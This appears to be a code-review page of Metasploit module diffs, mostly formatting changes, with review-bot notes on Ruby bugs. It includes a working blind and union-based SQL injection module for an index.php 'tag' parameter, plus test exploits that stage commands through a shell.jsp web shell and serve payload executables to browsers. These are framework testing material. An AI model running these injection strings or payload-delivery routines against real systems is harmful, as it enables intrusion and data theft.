'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => %w[linux], 'Platform' => %w[linux],
'References' => 'References' => [],
[],
'Targets' => [['Wildcard Target', {}]], 'Targets' => [['Wildcard Target', {}]],
'DefaultTarget' => 0 'DefaultTarget' => 0
) )
@ -41,18 +39,18 @@ class MetasploitModule < Msf::Auxiliary
def boolean_blind def boolean_blind
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: { sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: {
encoder: encoder, encoder: encoder,
hex_encode_strings: datastore['HexEncodeStrings'], hex_encode_strings: datastore['HexEncodeStrings'],
safe: datastore['Safe'] safe: datastore['Safe']
}) do |payload| }) do |payload|
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST', 'method' => 'POST',
'vars_post' => { 'vars_post' => {
'tag' => "' or #{payload}--", 'tag' => "' or #{payload}--",
'search' => 'Check Plan' 'search' => 'Check Plan'
} }
}) })
res.body.include?('Dear') res.body.include?('Dear')
end end
unless sqli.test_vulnerable unless sqli.test_vulnerable
@ -66,18 +64,18 @@ class MetasploitModule < Msf::Auxiliary
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength'] truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
sqli = create_sqli(dbms: SQLitei::Common, opts: { sqli = create_sqli(dbms: SQLitei::Common, opts: {
encoder: encoder, encoder: encoder,
hex_encode_strings: datastore['HexEncodeStrings'], hex_encode_strings: datastore['HexEncodeStrings'],
truncation_length: truncation, truncation_length: truncation,
safe: datastore['Safe'] safe: datastore['Safe']
}) do |payload| }) do |payload|
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET', 'method' => 'GET',
'vars_get' => { 'vars_get' => {
'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--" 'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--"
} }
}) })
if !res if !res
'' ''
else else
@ -100,18 +98,18 @@ class MetasploitModule < Msf::Auxiliary
def time_blind def time_blind
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: { sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: {
encoder: encoder, encoder: encoder,
hex_encode_strings: datastore['HexEncodeStrings'], hex_encode_strings: datastore['HexEncodeStrings'],
safe: datastore['Safe'] safe: datastore['Safe']
}) do |payload| }) do |payload|
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST', 'method' => 'POST',
'vars_post' => { 'vars_post' => {
'tag' => "' or #{payload}--", 'tag' => "' or #{payload}--",
'search' => 'Check Plan' 'search' => 'Check Plan'
} }
}) })
raise ArgumentError unless res raise ArgumentError unless res
end end
unless sqli.test_vulnerable unless sqli.test_vulnerable
@ -141,9 +139,9 @@ class MetasploitModule < Msf::Auxiliary
def check def check
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'), 'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET' 'method' => 'GET'
}) })
if res&.body&.include?('--==[[IndiShell Lab]]==--') if res&.body&.include?('--==[[IndiShell Lab]]==--')
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Vulnerable
else else
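Review bot: In the `boolean_blind` hunk the oracle block ends with `res.body.include?('Dear')`, which raises NoMethodError if `send_request_cgi` returns nil. The other blocks in this file guard that case: `if !res` in the union-based block, `raise ArgumentError unless res` in `time_blind`, and `res&.body&.include?` in `check`. Adding `raise ArgumentError unless res` before the `include?` line would match `time_blind` and make a missing response fail the same way in both blind modes. `boolean_blind` continues past the end of its hunk, so any handling after `sqli.test_vulnerable` is not visible here.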


@ -3,29 +3,27 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Internal Aggressive Test Exploit', update_info(
'Description' => info,
"This module tests the exploitation of a test service.", 'Name' => 'Internal Aggressive Test Exploit',
'Author' => 'skape', 'Description' => "This module tests the exploitation of a test service.",
'License' => MSF_LICENSE, 'Author' => 'skape',
'Arch' => 'x86', 'License' => MSF_LICENSE,
'Payload' => 'Arch' => 'x86',
{ 'Payload' => {
'Space' => 1000, 'Space' => 1000,
'MaxNops' => 0, 'MaxNops' => 0,
'BadChars' => "\x00", 'BadChars' => "\x00",
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
}, },
'Targets' => 'Targets' => [
[
# Target 0: Universal # Target 0: Universal
[ [
'Any Platform', 'Any Platform',
@ -37,13 +35,13 @@ class MetasploitModule < Msf::Exploit::Remote
'Test encoder specific', 'Test encoder specific',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Payload' => 'Payload' =>
{ {
'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' => 'EncoderOptions' =>
{ {
'BufferRegister' => 'EBX', 'BufferRegister' => 'EBX',
'BufferOffset' => 4 'BufferOffset' => 4
} }
} }
}, },
@ -52,32 +50,35 @@ class MetasploitModule < Msf::Exploit::Remote
'Cannot be encoded', 'Cannot be encoded',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Payload' => 'Payload' =>
{ {
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s 'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
} }
} }
], ],
[ 'Test context encoder', [
'Test context encoder',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00" 'BadChars' => "\x00"
} }
} }
] ]
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
register_options( register_options(
[ [
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]), OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ]) OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
]) ]
)
end end
def autofilter def autofilter
false false
end end
@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
# Show disassembled payload for context encoder test # Show disassembled payload for context encoder test
if target.name =~ /context encoder/ if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40]) puts Rex::Assembly::Nasm.disassemble(payload.encoded[0, 40])
end end
connect connect
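Review bot: In the 'Cannot be encoded' target, `'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s` does not build a string of all 256 byte values. On Ruby 1.9 and later `Array#to_s` returns the array's `inspect` form, so the value holds only the printable characters of that representation. If the intent is to mark every byte as bad, which the target name suggests, the line should be `'BadChars' => (0..255).map(&:chr).join`. The same expression appears twice in the MIPS test module's target list further down this page.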


@ -3,78 +3,77 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept", update_info(
'Description' => %q{ info,
Here's an example of building an exploit using the BrowserExploitServer. 'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept",
This example requires the target to be exploit. If not, the mixin will 'Description' => %q{
send a fake 404 as a way to avoid engaging the target. The example is Here's an example of building an exploit using the BrowserExploitServer.
for Windows only. This example requires the target to be exploit. If not, the mixin will
}, send a fake 404 as a way to avoid engaging the target. The example is
'License' => MSF_LICENSE, for Windows only.
'Author' => [ 'sinn3r' ], },
'References' => 'License' => MSF_LICENSE,
[ 'Author' => [ 'sinn3r' ],
'References' => [
[ 'URL', 'https://metasploit.com' ] [ 'URL', 'https://metasploit.com' ]
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' => {
{
:source => /script|headers/i, :source => /script|headers/i,
#:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1 # :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
#:method => "LoadMovie", # :method => "LoadMovie",
:os_name => /win/i :os_name => /win/i
}, },
'Targets' => 'Targets' => [
[
[ 'Automatic', {} ], [ 'Automatic', {} ],
[ [
'Windows XP with IE 8', 'Windows XP with IE 8',
{ {
'os_flavor' => 'XP', 'os_flavor' => 'XP',
'ua_name' => 'MSIE', 'ua_name' => 'MSIE',
'ua_ver' => '8.0', 'ua_ver' => '8.0',
'Rop' => true, 'Rop' => true,
'Offset' => 0x100 'Offset' => 0x100
} }
], ],
[ [
'Windows 7 with IE 9', 'Windows 7 with IE 9',
{ {
'os_flavor' => '7', 'os_flavor' => '7',
'ua_name' => 'MSIE', 'ua_name' => 'MSIE',
'ua_ver' => '9.0', 'ua_ver' => '9.0',
'Rop' => true, 'Rop' => true,
'Offset' => 0x100 'Offset' => 0x100
} }
], ],
[ [
'Windows 7 with IE 10', 'Windows 7 with IE 10',
{ {
'os_flavor' => '7', 'os_flavor' => '7',
'ua_name' => 'MSIE', 'ua_name' => 'MSIE',
'ua_ver' => '10.0', 'ua_ver' => '10.0',
'Rop' => true, 'Rop' => true,
'Offset' => 0x100 'Offset' => 0x100
} }
] ]
], ],
'Payload' => 'Payload' => {
{ 'BadChars' => "\x00", # Our spray doesn't like null bytes
'BadChars' => "\x00", #Our spray doesn't like null bytes
'StackAdjustment' => -3500 'StackAdjustment' => -3500
}, },
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => '2013-04-01', 'DisclosureDate' => '2013-04-01',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
# #


@ -3,31 +3,32 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit class MetasploitModule < Msf::Exploit
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Check Test Exploit", update_info(
'Description' => %q{ info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules. This module ensures that 'check' actually functions for Exploit modules.
}, },
'References' => 'References' => [
[
[ 'OSVDB', '0' ] [ 'OSVDB', '0' ]
], ],
'Author' => 'Author' => [
[
'todb' 'todb'
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DisclosureDate' => '2013-05-23' 'DisclosureDate' => '2013-05-23'
)) )
)
register_options( register_options(
[ [
Opt::RPORT(80) Opt::RPORT(80)
], self.class) ], self.class
)
end end
def check def check


@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred # =( need more targets and perhaps more OS specific return values OS specific would be preferred
@ -12,47 +11,48 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::CmdStager include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Command Stager Web Test', update_info(
'Description' => %q{ info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server. on an Apache Tomcat server.
}, },
'Author' => 'bannedit', 'Author' => 'bannedit',
'References' => 'References' => [
[
], ],
'DefaultOptions' => 'DefaultOptions' => {
{
}, },
'Payload' => 'Payload' => {
{
}, },
'Platform' => 'win', 'Platform' => 'win',
'Privileged' => true, 'Privileged' => true,
'Targets' => 'Targets' => [
[
# need more but this will likely cover most cases # need more but this will likely cover most cases
[ 'Automatic Targeting', [
'Automatic Targeting',
{ {
'auto' => true 'auto' => true
} }
], ],
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => '2010-02-03')) 'DisclosureDate' => '2010-02-03'
)
)
register_options( register_options(
[ [
Opt::RPORT(8080), Opt::RPORT(8080),
], self.class) ], self.class
)
end end
def autofilter def autofilter
false false
end end
# This is method required for the CmdStager to work... # This is method required for the CmdStager to work...
def execute_command(cmd, opts) def execute_command(cmd, opts)
uri = opts[:uri] uri = opts[:uri]
@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
opts = { opts = {
:delay => 0.5, :delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS" :uri => "/shell/shell.jsp?cmd=CMDS"
@ -72,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote
execute_cmdstager(opts) execute_cmdstager(opts)
handler handler
end end
end end


@ -3,37 +3,37 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Dialup include Msf::Exploit::Remote::Dialup
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Test Dialup Exploit', update_info(
'Description' => %q{ info,
This exploit connects to a system's modem over dialup and provides 'Name' => 'Test Dialup Exploit',
the user with a readout of the login banner. 'Description' => %q{
}, This exploit connects to a system's modem over dialup and provides
'Author' => the user with a readout of the login banner.
[ },
'Author' => [
'I)ruid', 'I)ruid',
], ],
'Arch' => ARCH_TTY, 'Arch' => ARCH_TTY,
'Platform' => ['unix'], 'Platform' => ['unix'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Payload' => 'Payload' => {
{ 'Space' => 1000,
'Space' => 1000,
'BadChars' => '', 'BadChars' => '',
'DisableNops' => true, 'DisableNops' => true,
}, },
'Targets' => 'Targets' => [
[ [ 'Automatic', {} ],
[ 'Automatic', { } ],
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def autofilter def autofilter


@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
@ -11,43 +10,46 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Egghunter include Msf::Exploit::Egghunter
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Internal Egghunter Test Exploit', update_info(
'Description' => info,
"This module tests the exploitation of a test service using the Egghunter.", 'Name' => 'Internal Egghunter Test Exploit',
'Author' => 'jduck', 'Description' => "This module tests the exploitation of a test service using the Egghunter.",
'License' => MSF_LICENSE, 'Author' => 'jduck',
'Arch' => ARCH_X86, 'License' => MSF_LICENSE,
'Payload' => 'Arch' => ARCH_X86,
{ 'Payload' => {
'Space' => 1000, 'Space' => 1000,
'MaxNops' => 0, 'MaxNops' => 0,
'BadChars' => "\x00", 'BadChars' => "\x00",
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
}, },
'Targets' => 'Targets' => [
[ [
[ 'Windows', 'Windows',
{ {
'Platform' => 'win' 'Platform' => 'win'
} }
], ],
[ 'Linux', [
'Linux',
{ {
'Platform' => 'linux' 'Platform' => 'linux'
} }
] ]
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
register_options( register_options(
[ [
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]) OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
]) ]
)
end end
def autofilter def autofilter
false false
end end
@ -57,20 +59,19 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
connect connect
print_status("Sending #{payload.encoded.length} byte payload...") print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true :checksum => true
}) })
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes") print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = '' sploit = ''
# break before? # break before?
#sploit << "\xcc" # sploit << "\xcc"
sploit << eh_stub sploit << eh_stub
# just return otherwise # just return otherwise
sploit << "\xc3" sploit << "\xc3"


@ -3,47 +3,45 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE include Msf::Exploit::EXE
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Explib2 Drop Exec Test Case", update_info(
'Description' => %q{ info,
This module allows to test integration of Explib2 into metasploit. 'Name' => "Explib2 Drop Exec Test Case",
}, 'Description' => %q{
'License' => MSF_LICENSE, This module allows to test integration of Explib2 into metasploit.
'Author' => },
[ 'License' => MSF_LICENSE,
'Author' => [
'guhe120', # Original explib2 author 'guhe120', # Original explib2 author
'juan vazquez' 'juan vazquez'
], ],
'References' => 'References' => [
[
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted [ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' => {
{ :source => /script/i,
:source => /script/i,
:os_name => OperatingSystems::WINDOWS, :os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
:ua_ver => '11.0' :ua_ver => '11.0'
}, },
'Targets' => 'Targets' => [
[ [ 'Automatic', {} ]
[ 'Automatic', { } ]
], ],
'DisclosureDate' => '2014-03-28', 'DisclosureDate' => '2014-03-28',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def exploit_html def exploit_html
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u") exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
template = %Q|<html> template = %Q|<html>


@ -3,42 +3,41 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Explib2 Exec Test Case", update_info(
'Description' => %q{ info,
This module allows to test integration of Explib2 into metasploit. 'Name' => "Explib2 Exec Test Case",
}, 'Description' => %q{
'License' => MSF_LICENSE, This module allows to test integration of Explib2 into metasploit.
'Author' => },
[ 'License' => MSF_LICENSE,
'Author' => [
'guhe120', # Original explib2 author 'guhe120', # Original explib2 author
'juan vazquez' 'juan vazquez'
], ],
'References' => 'References' => [
[
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted [ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' => {
{ :source => /script/i,
:source => /script/i,
:os_name => OperatingSystems::WINDOWS, :os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
:ua_ver => '11.0' :ua_ver => '11.0'
}, },
'Targets' => 'Targets' => [
[ [ 'Automatic', {} ]
[ 'Automatic', { } ]
], ],
'DisclosureDate' => '2014-03-28', 'DisclosureDate' => '2014-03-28',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def exploit_html def exploit_html


@ -3,51 +3,50 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'MIPS Aggressive Test Exploit', update_info(
'Description' => 'This module tests the exploitation of a test service', info,
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'], 'Name' => 'MIPS Aggressive Test Exploit',
'License' => MSF_LICENSE, 'Description' => 'This module tests the exploitation of a test service',
#'Arch' => ARCH_MIPSBE, 'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'Payload' => 'License' => MSF_LICENSE,
{ # 'Arch' => ARCH_MIPSBE,
'MaxNops' => 0, 'Payload' => {
#'BadChars' => "\x00", 'MaxNops' => 0,
#'StackAdjustment' => -3500, # 'BadChars' => "\x00",
# 'StackAdjustment' => -3500,
}, },
'Targets' => 'Targets' => [
[
# Target 0: Universal # Target 0: Universal
[ [
'Mips big endian', 'Mips big endian',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE 'Arch' => ARCH_MIPSBE
} }
], ],
[ [
'Mips big endian cannot be encoded', 'Mips big endian cannot be encoded',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE, 'Arch' => ARCH_MIPSBE,
'Payload' => 'Payload' =>
{ {
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s 'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
} }
} }
], [ ], [
'Mips big endian encoder needed', 'Mips big endian encoder needed',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE, 'Arch' => ARCH_MIPSBE,
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00" 'BadChars' => "\x00"
} }
@ -57,43 +56,44 @@ class MetasploitModule < Msf::Exploit::Remote
'Mips little endian', 'Mips little endian',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE 'Arch' => ARCH_MIPSLE
} }
], ],
[ [
'Mips little endian cannot be encoded', 'Mips little endian cannot be encoded',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE, 'Arch' => ARCH_MIPSLE,
'Payload' => 'Payload' =>
{ {
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s 'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
} }
} }
], [ ], [
'Mips little endian encoder needed', 'Mips little endian encoder needed',
{ {
'Platform' => [ 'linux', 'win' ], 'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE, 'Arch' => ARCH_MIPSLE,
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00" 'BadChars' => "\x00"
} }
} }
], ],
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
register_options( register_options(
[ [
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]), OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ]) OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
]) ]
)
end end
def autofilter def autofilter
false false
end end
@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
# Show disassembled payload for context encoder test # Show disassembled payload for context encoder test
if target.name =~ /context encoder/ if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40]) # puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!) # FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end end
connect connect


@ -8,30 +8,35 @@ require 'rex'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
def initialize( info = {} ) def initialize(info = {})
super( update_info( info, super(
'Name' => 'Exec', update_info(
'Description' => %q{ }, info,
'License' => MSF_LICENSE, 'Name' => 'Exec',
'Author' => [ 'egypt' ], 'Description' => %q{ },
'References' => [ ], 'License' => MSF_LICENSE,
'Platform' => [ 'java', 'linux' ], 'Author' => [ 'egypt' ],
'Arch' => ARCH_JAVA, 'References' => [ ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Platform' => [ 'java', 'linux' ],
'Targets' => 'Arch' => ARCH_JAVA,
[ 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
[ 'Generic (Java Payload)', { 'Targets' => [
'Arch' => ARCH_JAVA, [
'Platform' => 'java' 'Generic (Java Payload)', {
} ], 'Arch' => ARCH_JAVA,
[ 'Linux', { 'Platform' => 'java'
'Arch' => ARCH_X86, }
'Platform' => 'linux' ],
} ], [
'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) )
)
end end
def exploit def exploit
@ -47,4 +52,3 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end


@ -1,28 +1,30 @@
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "IE Test for Javascript Libs", update_info(
'Description' => %q{ info,
Tests Javascript hotness 'Name' => "IE Test for Javascript Libs",
}, 'Description' => %q{
'License' => MSF_LICENSE, Tests Javascript hotness
'Author' => [ 'sinn3r' ], },
'References' => [ [ 'URL', 'https://metasploit.com' ] ], 'License' => MSF_LICENSE,
'Platform' => 'win', 'Author' => [ 'sinn3r' ],
'Targets' => [ [ 'Automatic', {} ] ], 'References' => [ [ 'URL', 'https://metasploit.com' ] ],
'Payload' => 'Platform' => 'win',
{ 'Targets' => [ [ 'Automatic', {} ] ],
'BadChars' => "\x00", 'Payload' => {
'BadChars' => "\x00",
'StackAdjustment' => -3500 'StackAdjustment' => -3500
}, },
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => '2013-04-01', 'DisclosureDate' => '2013-04-01',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def test_base64 def test_base64
@ -72,12 +74,10 @@ class MetasploitModule < Msf::Exploit::Remote
| |
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
# Change the following to a specific function # Change the following to a specific function
js = test_base64 js = test_base64
html = %Q| html = %Q|
<!doctype html> <!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
@ -95,8 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
</html> </html>
| |
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })
end end
end end


@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
# #
# This is a test exploit for testing kernel-mode payloads. # This is a test exploit for testing kernel-mode payloads.
# #
@ -14,39 +13,40 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::KernelMode include Msf::Exploit::KernelMode
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Internal Kernel-mode Test Exploit', update_info(
'Description' => info,
"This module tests the exploitation of a kernel-mode test service.", 'Name' => 'Internal Kernel-mode Test Exploit',
'Author' => 'skape', 'Description' => "This module tests the exploitation of a kernel-mode test service.",
'License' => MSF_LICENSE, 'Author' => 'skape',
'Arch' => 'x86', 'License' => MSF_LICENSE,
'Payload' => 'Arch' => 'x86',
{ 'Payload' => {
'Space' => 1000, 'Space' => 1000,
'MaxNops' => 0, 'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500 'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
}, },
'Targets' => 'Targets' => [
[
[ [
'Windows XP SP2', 'Windows XP SP2',
{ {
